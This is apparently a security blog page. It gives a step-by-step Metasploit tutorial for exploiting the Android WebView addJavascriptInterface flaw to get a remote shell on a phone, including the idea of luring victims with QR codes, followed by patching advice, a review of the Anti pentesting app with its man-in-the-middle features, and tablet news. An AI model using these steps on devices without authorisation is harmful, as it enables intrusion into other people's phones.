Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

Anti – Android Network Toolkit and 7″ Tablet make a $99 Pentesting Platform

Every once in a while you run into a product that just makes you sit back and say – “Wow!”

I just picked up a 7″ Polaroid tablet for $99 and was stunned at how good it works. The screen quality, how smooth it ran and how responsive it was. In some functions it works better than my trusty iPad that cost a whole lot more.

Well, I wanted to see how well the Android Tablet could work as a pentesting platform and found “Anti” the Android Network Toolkit by zImperium. I was stunned.

I just used the “Free” version, and within seconds I was looking at a network map of all the machines on my network. Anti runs nmap scans, including an intrusive scan to detect device Operating Systems and vulnerabilities. Once the scan is done, it can take a while, you can click on individual systems and are presented with a tool option menu. These options include:

Attack, DoS, Cracker, Replace Image, Spy, Man in the Middle

Some of the more advanced tools require you to purchase “Anti credits” to run them. But with the free version, you can view available networks, and run scans against them.

I ran it on my wireless network and was able to view a wired system. For a short period of time, I could see a text list of what websites the computer was visiting, and even images from the visited websites. The options even included “View Passwords”, but this did not seem to be enabled in the free version. Obviously it was working in some sort of Man-in-the-Middle mode to be able grab the information off of a wired lan system connected to a switch. Very interesting.

And this was just the free version, the paid versions reportedly includes remote exploit capability.

Anti also includes a reporting feature so you can keep a track of vulnerable systems found during your pentest. Using Anti on a cheap $99 Android tablet really opens up a lot of possibilities for pentesters.

India Announces $35 Android 2.2 Tablet!!!

Let the price war begin. Recently, Amazon announced the “Kindle Fire“, a Kindle reader on steroids that allows you to browse the web, play apps and watch movies. Now India has announced it’s home grown “Aakash Tablet“, which will initially sell to India’s college students for $35.

The India government is subsidizing the first 100,000 to get the price down to $35. But the actual cost is only $50, and they have plans to get the cost down to around $10.

The Tablet, runs Android 2.2 and sports a 7″ screen, 256 MB of RAM, 2GB of flash memory and a 2GB Micro-SD and 2 USB ports. It also comes with Wi-Fi support and offers 3G as an option.

Here is a video showing the tablet in use:

Looks pretty interesting, and with the low price point, looks like a tablet price war may soon ensue. This is all good news for the end user!